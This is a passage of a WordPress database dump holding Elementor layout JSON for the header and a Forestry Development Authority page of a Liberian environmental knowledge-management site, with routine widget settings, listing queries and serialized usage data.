":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}]},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.7690000000000001278976924368180334568023681640625},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.9849999999999994315658113919198513031005859375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.91199999999999903366187936626374721527099609375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27240,3953,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27245,3954,'_elementor_edit_mode','builder'),(27246,3954,'_elementor_template_type','header'),(27247,3954,'_elementor_version','3.4.0'),(27248,3954,'_elementor_pro_version','3.3.6'),(27249,3954,'_wp_page_template','default'),(27250,3954,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.7690000000000001278976924368180334568023681640625},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.9849999999999994315658113919198513031005859375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.91199999999999903366187936626374721527099609375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27252,3954,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27256,1582,'institution_logo','2109'),(27257,3956,'_elementor_edit_mode','builder'),(27258,3956,'_elementor_template_type','wp-post'),(27259,3956,'_elementor_version','2.7.5'),(27260,3956,'_wp_page_template','default'),(27261,3956,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27262,3956,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27263,3956,'_thumbnail_id','2717'),(27264,3957,'_elementor_edit_mode','builder'),(27265,3957,'_elementor_template_type','wp-post'),(27266,3957,'_elementor_version','2.7.5'),(27267,3957,'_wp_page_template','default'),(27268,3957,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\